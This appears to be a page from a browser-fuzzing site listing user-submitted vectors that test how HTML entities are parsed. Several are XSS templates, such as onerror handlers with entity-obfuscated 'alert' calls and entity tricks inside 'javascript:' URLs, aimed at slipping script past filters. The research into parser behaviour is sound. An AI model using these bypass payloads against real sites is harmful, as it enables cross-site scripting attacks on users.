
Featured vector
No vectors found in the last 30 days
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,424,269 Successful fuzzes
Fuzz Vectors
Searching for "entity"
Your browser identified asGeneral Crawlers unknown
All vectors
Description | Vector | Created by |
---|---|---|
chars allowed between a html entity | <!-- sample vector --> <img src=x onerror="&#x*chr*61lert(*num*);logChr(*num*);"> | @S1r1u5_ |
Entities allowed with no semi colon | htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
HTML Entity in between and | <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> | @MisterJyu |
Entities allowed instead of colon for js protocol | htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @peksa |
Entities allowed after js protocol | htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
Entities allowed before js protocol | htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |